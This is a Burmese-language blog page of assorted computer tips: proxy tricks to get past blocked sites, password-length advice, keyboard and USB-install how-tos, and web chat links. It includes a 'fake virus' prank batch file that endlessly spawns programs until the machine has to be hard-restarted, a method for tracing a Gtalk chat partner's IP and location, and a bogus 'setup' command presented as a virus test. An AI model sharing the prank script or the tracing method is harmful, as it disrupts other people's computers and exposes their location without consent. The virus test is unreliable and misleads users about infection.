Thet Htin

Access Denied ကို ကျော်ဖို့နည်းလမ်း

Original writer : ကိုကောင်းမြတ်
အခုချိန်မှာ blogspot site တွေအပါအ၀င်..... တစ်ချို့သော site တော်တော်များများကို Access Denied ဖြစ်နေတာများတယ်ဗျ ။  ဒါတွေကို proxy သုံးပြီးကျော်လို့ရပေမယ့်.... တစ်ခါတစ်ခါ download လုပ်ဖို့ကျတော့ အဆင်မပြေဘူး mediafire လိုမျိုးဆိုရင်ပေါ့ ။ ဒါလေးကို အဆင်ပြေမယ့် နည်းလေးက သင့် browser ရဲ့ internet setting မှာထည့်တဲ့ proxy ကို အရင် ygncache.mpt.net.mm ဆိုတဲ့နေရာမှာ...ygncache3.mpt.net.mm
လို့ပြောင်းလိုက်ရင် အဆင်ပြေသွားလိမ့်မယ်...ကောင်းကျိုးအတွက် သုံးချင်သူများအတွက်ပါ ဘာရည်ရွယ် ချက်မှမ ပါဘူးနော်....ဟဲဟဲ....
{ ခြွင်းချက်......တစ်ခါတစ်လေမှာ Access Denied ပဲ့ဆက်ပြနေတတ်တယ်... refresh လုပ်ဖို့ F5 ကို ဆက်တိုက်နှိပ်ပေးလိုက်ပါ....မရမချင်းပေါ့ }

source:http://sites.google.com/site/alinnyaungdownload/Home/accessdenied

H4CK3R တွေ.......

Hacker အတွက်မလွယ်ဘူး။ ဘာ့ကြောင့်ဆိုသော်

No.of Character      Possible combinations     Human                  Computer
1                                  36                         3mins                     0.000 018 sec
2                                 1300                       2hrs                       0.000 65 sec
3                                 47000                     3days                     0.02 sec
4                                1000000                   3 months                1 sec
5                                60000000                 10 yrs                     30 sec
10                        3700000000000000         580 million yrs         59 yrs

အထက်ပါ list လေးက networking စာအုပ်ထဲမှာပါတဲ့ password အကြောင်းလေးပါ..ဒါကတော့ hacker   သမားတွေရဲ့ သုံးတဲ့ software လေးတွေရဲ့ လုပ်ဆောင်ချက်ဖြစ်ပါတယ်။ ဒါကြောင့် password hacker
ကတော့ တကယ်မလွယ်ပါဘူး။ အထက်ပါအတိုင်းက alphabet (26) လုံးထဲက (10) ကိုထားမယ်ဆိုရင် တောင်အပေါ်ကအတိုင်း သူတို့က ကြာမှာဖြစ်ပါတယ်။
ဥပမာ       ၁ ၂ ထားမယ်ဆိုရင် သူတို့က ၀ ၁ ပြီးရင် ၀ ၂  ပြီးရင် ၀ ၃ ဆိုပြီးစသည်ဖြင့် software က
              မှန်းပြီးတော့ လုပ်မှာဖြစ်တယ် ဆိုတော့ လူဆိုရင်တော့ အထက်ပါလိုဆိုရင် ထီးတွေ၊ချဲ တွေ
              တွက်သလိုတွက်ရမှာပေါ့...ဒါပေမဲ့ software ကျတော့ computer ဦးနှောက်နဲ့ အထက်ပါတွေ့
              တဲ့အတိုင်း ခဏဘဲကြာမှာဖြစ်ပါတယ်။
အပေါ်က ဥပမာက နှစ်လုံးထဲကိုတောင် ဒီလိုမျိုး လူဆိုရင် နှစ်နာရီကြာမှာဖြစ်ပါတယ်.
ဒါပေမဲ့ Hacker ဆို တာက Computer hacker ဆိုတော့ သူက Computer သုံးမှာပေါ့ ဒါကြောင့် သူ့အတွက်တော့ 0.00065 စက္ကန့်ဘဲ ကြာမှာဖြစ်ပါတယ်။ ဒါပေမဲ့ ကျွန်တော်တို့က ၁၀ လုံးလောက် ထားပြီးဆိုရင်တော့ Computer လဲ ၅၉ နှစ်လောက်တော့ အေးအေးဆေးဆေး မှန်းပြီးတော့ လုပ်ရတော့မှာ ဖြစ်ပါတယ်။ ဒီအခါမှာ ကျွန်တော် စဉ်းစားကြည့်တယ် Computer ကတော့ မပိတ်ဘဲနေမှာ မဟုတ်ဘူး.ဒါကြောင့် 10 လုံးလောက်ထားရင်တော့ Hacker တွေလဲ hacker တော့မှာ မဟုတ်ဘူး
ဒီဟာလေးရေးလိုက်တာက ကျွန်တော် ကိုယ်တိုင်လဲရေးရင်နဲ့ မှသတိထားမိတယ်. ဘာဖြစ်လို့လဲဆိုတော့
password 5 လုံးဘဲ ထားတဲ့ဟာနဲ့ 10 လုံးထားတဲ့  နှစ်ခုကို hacker software နဲ့ မှန်းတဲ့နေရာမှာ
အချိန်က အများကြီးကွာ သွားတာကိုတွေ့ရတယ်။ ဒါကြောင့် ကျွန်တော်ဆို ၁၀လုံး ထားဖို့က ထားစရာ
password မရှိဘူး..ဒါပေမဲ့ ဒါလေးကိုမြင်လိုက်တဲ့ အခါမှာ သူတို့ရဲ့ ကွာခြားချက်ကြောင့် ကိုယ်လုံခြုံရေးကို
သတိထားပြီး ၁၀ လုံးလောက်တော့ ထားရမယ်ဆိုတာကို သတိထားမိသွားပါတယ်။ ဒါကြောင့် မိတ်ဆွေ
တို့လဲ password ကိုထားတဲ့ အခါမှာ ၁၀ လုံးလောက်တော့ ထားသင့်ပါတယ်။
ဒါနဲ့ ကျွန်တော်ပြောသလို ကျွန်တော်လဲ ၁၀လုံးလောက် password ထားဖို့ မရှိဘူးဆိုတော့
ဘယ်လိုထားရမလဲဆိုရင်.... 
ဥပမာ ကိုယ့်က password ကိုအရင်က itresharesite လို့ပေးထားတယ်.ဆိုရင်
iTrEsHaReSiTE စတာမျိုးပြီးတော့ +-(*)&^%$#@!~`?/ ဒါမျိုးတွေကိုလဲထည့်ပေးရင်
ပိုပြီးတော့ hacker တွေအတွက် ခက်မှန်းရခက်မှာဖြစ်ပါတယ်။ ဒါကြောင့် ကိုယ့်ရဲ့ လုံခြုံရေးအတွက် ကိုယ့်မှာသာ တာဝန်ရှိပါကြောင်း.. ပြန်လည်ဝေမျှလိုက်ပါတယ်။

Caps Lock, Num Lock, Scroll Lock ကီးများကို မှားယွင်းစွာ သုံးမိပါက အသံ သို့မဟုတ် အရိပ်ပြပြီး အချက်ပေးနည်း ဖြစ်ပါတယ်။

တစ်ခါတစ်ရံ မတော်တဆ Caps Lock ကို ထိမိကာ ပွင့်နေခြင်းမျိုး ဖြစ်တတ်ပါတယ်။ ဒါမှမဟုတ် Num Lock ကီးကို ပိတ်မိရင်လည်း

Keypad ကို သုံးလို့ မရတတ်ပါ။ ထိုသို့ အမှားများ ပြုလုပ်မိပါက အရေးကြီးသော အလုပ်လုပ်မည်ဆိုရင် နှောင့်နှေးစေတတ်ပါတယ်။

ဒါကြောင့် အမှားပြုလုပ်မိပါက အသံနှင့် သတိပေးခြင်း သို့မဟုတ် မော်နီတာတွင် အချက်ပြခြင်းများ ပြုရန် တင်ပြပေးလိုက်ပါတယ်။

လိုအပ်မယ်လို့လည်း ထင်ပါတယ်။ ဒါမှမဟုတ် သိပြိးသားလည်း ဖြစ်ချင်ဖြစ်နေမှာပါ။ သိသလောက်ကို ပြောပြခြင်းသာ

ဖြစ်ပါတယ်။

၁။ Start ထဲက Control Panel ကို ဖွင့်ပါ။
၂။ အတွင်းမှ Accessibility Options ကို ထပ်မံရွေးချယ်ပါ။
၃။ Accessibility Options(BOX) ပွင့်လာပါမည်။ ကီးဘုတ် tab သို့ပြောင်းပါ။
၎။ အတွင်းမှ Toggle keys အောက်မှ Use Toggle keys မှာ အမှတ်ပေးလိုက်ပါ။
၅။ ပြီးရင် Sound(tab) ကို ပြောင်းပေးပါ။
၆။ SoundSentry အောက်မှ Use SoundSentry ကို ရွေးချယ်လိုက်ပါ။
၇။ ထိုအခါ visual warning အတွက် ရွေးချယ်စရာများကို ပြပေးထားပြီး နှစ်သက်ရာတစ်ခုခုကို ရွေးလိုက်ပါ။ ဥပမာအားဖြင့် Flash the
active caption bar, Flash the active window, Flash the desktop ဆိုပြီး ပြပေးထားရာ ယင်းမှ Flash the active window ကို
ရွေးချယ်လိုက်ပါ။
၈။ Apply ကို နှိပ်ပြီး ok ကို ထပ်နှိပ်လိုက်ပါ။
ပြီးရင် စမ်းသပ်လို့ရပါပြီ။ Caps Lock ကို ဖွင့်ကြည့်လိုက်ပါ။ ထိုအခါ အသံတစ်သံထွက်လာလိမ့်မည်။ ဒါမှမဟုတ် မော်နီတာတွင် ဖျတ်ခနဲ
အရိပ်တစ်ခုပေါ်လာမည်ကို မြင်ရပါလိမ့်မည်။ ကီးတစ်ခုခုကို မှားယွင်းစွာ နှိပ်လိုက်မိရင် သတိပေးမည့် အကြောင်းအရာကို
တင်ပြလိုက်ရခြင်း ဖြစ်ပါတယ်။

memory stick ထဲသို့ software များ install လုပ်ခြင်း

အကယ်ရ်ျသင်ဟာ home user တစ်ယောက်ဖြစ်ပြီး internet ကို cafe မှာသုံးတဲ့လူဆိုရင်
ကျွန်တော်ရေးတဲ့ USB installation ဟာသင့်အတွက်အသုံးဝင်မယ်ထင်ပါတယ်
အဲဒီ usb installation ဟာကျွန်တော်ရဲ့ ကိုယ်ပိုင်အတွေ့ကြုံလေးပါ။
အခြားသူတွေတော့ memory stick ကို ဘယ်လိုအသုံးပြုလဲမသိပါဘူး။
ကျွန်တော်အတွက်တော့ internet cafe မှာကျွန်တော်သုံးချင်တဲ့ software install မလုပ်ထားလဲ အရေးမကြီးပါဘူး။

( ဟီး install လုပ်ထားရင်တော့ပိုကောင်းတာပေါ့။)

ကျွန်တော်ကတော့ သုံးချင်တဲ့ software တွေကိုအိမ် မှနေပြီး memory stick ထဲကို installtion လုပ်သွားတာပဲဗျ။

ကဲ air တော့နည်းနည်းရှည်သွားပြီ

အောက်မှာကြည့်လိုက်ပါဦးလား။

step 1 သင်အသုံးပြုလိုတဲ့ software ကို ပုံမှန် install လုပ်သလိုပဲ run လိုက်ပါ
software==>open==>Next==> Next
step 2 အဲဒီလိုလုပ်သွားရင်းန Full (or) Complete installation နဲ့ Custom installation ဆိုတာနှစ်ခုရှိပါတယ်။

step 3 အဲဒီမှာ Custom installation ကိုရွှေးပြီး Next ကိုနှိပ်ပါ။
ထိုနောက် box တစ်ခုပေါ်လာပါလိမ့်မယ်။

step 4 တက်လာတဲ့ box မှာ ကိုယ့်ရဲ့ memory stick ရှိတဲ့နေရာကိုရွှေးပေးပါ
box မှာဒီလိုလေးပေါ်နေလိမ့်မယ် F:\ your software name
ok နှိပ်ပါ ပြီးရင်တော့ install ပေါ့

မှတ်ချက် ။ ။F:\ ဆိုတာ ကိုယ့်ရဲ့ memory stick name

ကဲ့ memory stick လေးကိုဖွင့်ကြည့်ပါဦးလား။
စောစောတုန်းက install လုပ်ထားတဲ့ your software name ဆိုတဲ့ Folder လေးတွေ့လိမ့်မယ်
folder ကိုဖွင့်ပြီး အထဲမှာ software ရဲ့ အဓိက .exe ကိုရှာပါ
ပြီးရင် Double Click လုပ်ပြီး သုံးလို့ရပါပြီ
အားလုံးအဆင်ပြေပါစေခင်ဗျာ။

g talk မှ chat နေသူ၏ proxy ကိုကြည့်နည်း

gtalk ကနေပြီး ကို ချက်နေတဲ့ သူရဲ့ proxy ကို ကြည့်လို့ရပါတယ်။
Singapore က တို့
Austria က တို့ က နေ ချက် နေသလို ရွှိးနေတဲ့ သူတွေ သတိထား ကြ ပေါ့ Very Happy Very Happy Very Happy Very Happy Very Happy

ချက် နေရင်း နဲ့ သူ့ ကို call လိုက် ပါ

သူ accept လုပ် ပြီ ဆိုတာ နဲ့

ကိုယ့် gtalk ရဲ့ setting>> connection မှာ start monitor ကို click လိုက် တာ နဲ့ ဟိုဘက် က proxy ပေါ်လာ လိမ့် မယ်။

proxy ကို မှတ် ထား ပြီတော့ trace လိုက်ရင် သူသုံးနေတဲ့ Country, City , Server တွေ ကို လဲ သိနိုင်ပါတယ်

တစ်ခုတော့ ရှိတယ် ဗျာ

ကိုယ် ချက်နေ တဲ့ သူ က တခြား နိုင်ငံရဲ့ proxy ကို သုံးနေရင် တော့ တလွဲတွေပဲ ပြ နေလိမ့် မယ်

PS

တကယ် လုပ် တကယ် ဖြစ်တယ်

BLOG တစ်ခုလောက် လိုချင်သူများအတွက်

ဘလော့ဒ် ရေးချင်သူများ အတွက်
http://mylovecafe.com

မြန်မာနိုင်ငံက free blog hosting service တစ်ခုဖြစ်ပါတယ်

wordpress လိုပဲ သုံးစွဲ ရလွယ်ကူပါတယ်......

wordpress ထက် ကောင်းတာက ကွန်နက်ရှင် ကောင်းကောင်း မကောင်းကောင်း အသုံးပြုရတာ လွယ်ကူတယ် လို့ ထင်ပါတယ်...

သုံးလို့ ရ မရတော့ကျနော်လဲ မသိဘူး

virus အတု

ပျော်စရာ(Virus)အတုလေး
ရှိပြီးသားလားတော့မသိဘူး။မသိသေးသောသူများအတွက်သာဖြစ်ပါတယ်။ ဒီ (Virus)အတုလေးက ရှင်းချင်ရင်ခေါင်းစားလိမ့်မယ်။ဒီတော့မပြောတော့ပါဘူး။ကျွန်တော်လည်းသေသေချာချာမသိဘူး။တချို့ စက်တွေကျတော့ log off လုပ်ရင်ရတယ်။
ရှင်းချင်ရင် Restart(Casing)သာချလိုက်တော့။Windows ထဲက Restart ကိုပြောတာမဟုတ်ဘူးနော်။ကဲစမယ်။
Notepad ကိုဖွင့်အောက်ကစာသားတွေကူးပြီး filename.bat (.bat)နဲ့ save ပေးလိုက်။

@echo off
:A
start dir
start command
start explorer
start firefox
start notepad
start prefetch
start temp
start %temp%
goto:A

ဘယ်လိုပြန်ရှင်းရမလဲတော့ ကျနော်လဲ မသိဘူး....သိရင်လဲရေးပေးခဲ့ပါဦးဗျာ....

ths.december.17@gmail.com မှာလဲ လာရောက်ပြောပြပေးကြပါ....

g talk ကို အပိတ်ခံထားရသောသူများအတွက်

ကျွန်တော်တို့ အခုရက်ပိုင်း ကော်နက်ရှင်တွေအရမ်းကို ကျနေပါတယ်.....
Gtalk ပွင့်ဖို့ တောင် မနဲ့ လုပ်နေရတယ်...
Gtalk ပရိုဂရမ်ကနေ မချက်ပဲနဲ့  .. တခြားwebpage ပေါ်ကနေချက်နိုင်ပါတယ်....
ဒီဆိုဒ်လေးတွေက Gtalk စကားပြောလို့ မရတဲ့ လူတွေအတွက် website ပွင့်ရုံနဲ့ ချက်လို့ ရမဲ့ နည်းပါ....
http://www.iloveim.com

http://www.meebo.com

http://www.ebuddy.com

တစ်ခုမရတစ်ခုစမ်းသုံးကြည့်ပေါ့....

အလွယ်ဆုံး VIRUS ရှိ၊မရှိ စမ်းသပ်နည်း

virus ရှိ ၊ မရှိ စစ်မယ်ဆိုရင်....
တကယ်ထိရောက်တဲ့ နည်းလို့ မဆိုလိုပေမယ့် ခန်မှန်းနိုင်အောင်ပါ ..
Start-->Run --> cmd ရိုက်ထည့်ပါ .. Command prompt ပေါ်လာပါမည် ..
cd\ ရိုက်ထည့်ပါ enter နိုပ်ပါ
C:\>setup လို့ ရိုက်ထည့်မယ် enter နှိပ်မယ်...
ဒါဆိုရင် please go to the Control Panel to install and configure system components ဆိုပြီး dialog box လေးပေါ်လာရင် virus မရှိပါဘူး....။
မပေါ်ခဲ့ရင် တော့ virus ရှိနေပါပြီ...။

Recent Videos

129 views - 0 comments
91 views - 0 comments
202 views - 0 comments